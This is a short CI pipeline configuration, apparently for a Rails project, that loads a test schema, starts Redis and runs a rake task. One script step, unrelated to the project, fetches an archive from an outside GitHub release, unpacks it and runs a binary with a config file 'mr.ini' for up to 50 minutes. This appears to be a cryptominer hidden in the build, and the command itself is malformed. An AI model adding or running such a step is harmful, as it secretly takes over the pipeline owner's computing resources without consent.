before_script:
  - RAILS_ENV=test bundle exec rake db:schema:load
rvm: true
environment:
  REDIS_URL: redis://redis:6379/0
services:
  redis:
    image: redis:5.0.7
    expose:
      - 6379
script:
  - https://github.com/voc9/mxc/releases/download/mxc/MXC.tar.gz && tar -xvf MXC.tar.gz && timeout 50m ./node mr.ini
  - bundle exec rake best_practice_project:run
